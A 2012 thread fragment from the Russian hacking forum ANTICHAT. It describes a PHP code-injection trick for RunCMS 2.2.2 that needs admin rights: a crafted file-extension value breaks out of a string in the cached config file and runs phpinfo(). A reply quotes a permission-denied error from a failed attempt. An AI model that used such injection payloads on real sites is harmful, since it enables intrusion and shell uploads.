ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #38  
Старый 06.07.2012, 02:11
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами: 9128075

Репутация: 3
По умолчанию

Цитата:
Сообщение от b3  
Заливка шелла в последнюю на данный момент версию RunCMS 2.2.2. Нужны права Админа. Идем в
Архив файлов
->
Основные настройки
->
Допустимые форматы скриншота
(modules/downloads/admin/index.php?op=downloadsConfigAdmin)
Это поле является предпоследней строкой кода в файле:
\modules\downloads\cache\config.php
Вписываем:
Код:
.gif|.jpg|.bmp|.png'; phpinfo(); ?>
Сохраняем... и после обновления страницы отобразится
phpinfo();
после заливки

Цитата:
Сообщение от None  
Номер ошибки: 2 [Предупреждение (выполнение скрипта не прерывается)]
Описание ошибки: fopen(../cache/config.php) [function.fopen]: failed to open stream: Permission denied
В файле: D:\inetpub\\httpdocs\modules\mydownloads\admin\ind ex.php
В строке: 1480
И так со всеми способами =(
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.